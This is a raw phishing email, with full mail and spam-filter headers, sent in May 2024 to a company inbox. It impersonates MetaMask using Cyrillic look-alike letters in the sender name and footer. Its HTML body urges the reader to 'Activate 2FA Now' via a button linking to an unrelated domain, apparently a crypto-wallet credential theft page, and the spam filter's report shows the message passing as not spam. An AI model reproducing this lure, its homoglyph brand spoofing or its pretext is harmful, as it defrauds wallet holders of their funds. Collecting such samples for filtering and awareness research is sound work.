
­­­­­­­­­­­­­­­­­­
<!DOCTYPE html>
<html>
Return-Path: <postmaster@e927bd78ce.nxcli.io>
Delivered-To: info@autozone.com.sa
Received: from node93.myfcloudin.com
	by node93.myfcloudin.com with LMTP
	id ShScDWMxOGYcMyUAhsgHWA
	(envelope-from <postmaster@e927bd78ce.nxcli.io>)
	for <info@autozone.com.sa>; Mon, 06 May 2024 01:24:51 +0000
Return-path: <postmaster@e927bd78ce.nxcli.io>
Envelope-to: info@autozone.com.sa
Delivery-date: Mon, 06 May 2024 01:24:51 +0000
Received: from cloudhost-186207.uk-south-2.nxcli.net ([165.84.219.125]:38780)
	by node93.myfcloudin.com with esmtps  (TLS1.2) tls TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256
	(Exim 4.96.2)
	(envelope-from <postmaster@e927bd78ce.nxcli.io>)
	id 1s3n5y-00AEBh-0v
	for info@autozone.com.sa;
	Mon, 06 May 2024 01:24:50 +0000
Received: (qmail 10392 invoked by uid 10189); 6 May 2024 02:13:06 +0100
To: info@autozone.com.sa
Subject: Notice: Secure Your Funds with These Essential Tips
X-PHP-Originating-Script: 10189:mail.php
Date: Mon, 6 May 2024 01:06:14 +0000
From: =?UTF-8?B?0JzQtXTQsNCc0LBzaw==?= <2fa58340@mt.io>
Message-ID: <6e965bdd1a3c0f2c78ce0ce23356420b@mt.io>
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="1be28c018730aea33948b9b8ae5b4b29b"
Content-Transfer-Encoding: 8bit
X-Spam-Status: No, score=4.0
X-Spam-Score: 40
X-Spam-Bar: ++++
X-Ham-Report: Spam detection software, running on the system "node93.myfcloudin.com",
 has NOT identified this incoming email as spam.  The original
 message has been attached to this so you can view it or label
 similar future email.  If you have any questions, see
 root\@localhost for details.
 Content preview:  Activate Two-Factor Authentication body { font-family: Arial,
    sans-serif; background-color: #f5f5f5; margin: 0; padding: 0; } .container
    { max-width: 600px; margin: 20px auto; padding: 20px; background-color: #ffffff;
    box-shadow: 0 0 10px rgba(0, 0, 0, 0.1); border-radius: 10px; } 
 Content analysis details:   (4.0 points, 5.0 required)
  pts rule name              description
 ---- ---------------------- --------------------------------------------------
  0.2 HEADER_FROM_DIFFERENT_DOMAINS From and EnvelopeFrom 2nd level
                             mail domains are different
  0.0 HTML_MESSAGE           BODY: HTML included in message
  0.7 HTML_IMAGE_ONLY_28     BODY: HTML: images with 2400-2800 bytes of
                             words
  2.0 PYZOR_CHECK            Listed in Pyzor
                             (https://pyzor.readthedocs.io/en/latest/)
  1.0 KAM_LAZY_DOMAIN_SECURITY Sending domain does not have any
                             anti-forgery methods
  0.0 KAM_DMARC_STATUS       Test Rule for DKIM or SPF Failure with Strict
                             Alignment
X-Spam-Flag: NO


This is a multi-part message in MIME format.

--1be28c018730aea33948b9b8ae5b4b29b
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit





    
    
    Activate Two-Factor Authentication
    
        body {
            font-family: Arial, sans-serif;
            background-color: #f5f5f5;
            margin: 0;
            padding: 0;
        }

        .container {
            max-width: 600px;
            margin: 20px auto;
            padding: 20px;
            background-color: #ffffff;
            box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
            border-radius: 10px;
        }

        h1 {
            color: #007BFF;
            text-align: center;
            margin-bottom: 20px;
        }

        p {
            color: #333333;
            line-height: 1.6;
            margin-bottom: 15px;
        }

        .cta-button {
            display: inline-block;
            padding: 12px 24px;
            font-size: 16px;
            font-weight: bold;
            text-align: center;
            text-decoration: none;
            background-color: #007BFF;
            color: #ffffff;
            border-radius: 5px;
            transition: background-color 0.3s ease;
        }

        .cta-button:hover {
            background-color: #0056b3;
        }

        .footer-text {
            color: #808080;
            font-size: 12px;
            text-align: center;
            margin-top: 20px;
        }

        .logo {
            display: block;
            margin: 0 auto;
            width: 300px; /* Adjust the width as needed */
            padding-top: 30px; /* Add some space between logo and content */
        }
    



    
        
        Secure Your Funds with 2FA
        
        Protect your account and secure your funds with an extra layer of security. Activate Two-Factor Authentication (2FA) today:
        Activate 2FA Now
        If you need assistance or have any questions, our support team is here to help.
        Thank you for safeguarding your account with us.
        © 2024 МеtаМаsk. All rights reserved. This email is for account security purposes and cannot be replied to directly.
    




--1be28c018730aea33948b9b8ae5b4b29b
Content-Type: text/html; charset=UTF-8
Content-Transfer-Encoding: 8bit

<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Activate Two-Factor Authentication</title>
    <style>
        body {
            font-family: Arial, sans-serif;
            background-color: #f5f5f5;
            margin: 0;
            padding: 0;
        }

        .container {
            max-width: 600px;
            margin: 20px auto;
            padding: 20px;
            background-color: #ffffff;
            box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
            border-radius: 10px;
        }

        h1 {
            color: #007BFF;
            text-align: center;
            margin-bottom: 20px;
        }

        p {
            color: #333333;
            line-height: 1.6;
            margin-bottom: 15px;
        }

        .cta-button {
            display: inline-block;
            padding: 12px 24px;
            font-size: 16px;
            font-weight: bold;
            text-align: center;
            text-decoration: none;
            background-color: #007BFF;
            color: #ffffff;
            border-radius: 5px;
            transition: background-color 0.3s ease;
        }

        .cta-button:hover {
            background-color: #0056b3;
        }

        .footer-text {
            color: #808080;
            font-size: 12px;
            text-align: center;
            margin-top: 20px;
        }

        .logo {
            display: block;
            margin: 0 auto;
            width: 300px; /* Adjust the width as needed */
            padding-top: 30px; /* Add some space between logo and content */
        }
    </style>
</head>

<body>
    <div class="container">
        <img class="logo" src="https://theme.zdassets.com/theme_assets/2313093/bad730fb4fa8145bf225c509b343cc23f951c2e9.svg" alt="МеtаМаsk Logo">
        <h1>Secure Your Funds with 2FA</h1>
        
        <p>Protect your account and secure your funds with an extra layer of security. Activate Two-Factor Authentication (2FA) today:</p>
        <a class="cta-button" href="https://dermaspa.cl/sc" target="_blank">Activate 2FA Now</a>
        <p>If you need assistance or have any questions, our support team is here to help.</p>
        <p>Thank you for safeguarding your account with us.</p>
        <p class="footer-text">© 2024 МеtаМаsk. All rights reserved. This email is for account security purposes and cannot be replied to directly.</p>
    </div>
</body>

</html>



--1be28c018730aea33948b9b8ae5b4b29b--

